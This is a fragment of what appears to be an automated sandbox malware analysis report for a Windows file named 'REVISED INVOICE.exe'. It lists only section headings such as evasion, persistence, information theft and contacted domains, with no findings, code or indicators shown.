Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
REVISED INVOICE.exe

Malware Threat Intel
Provided by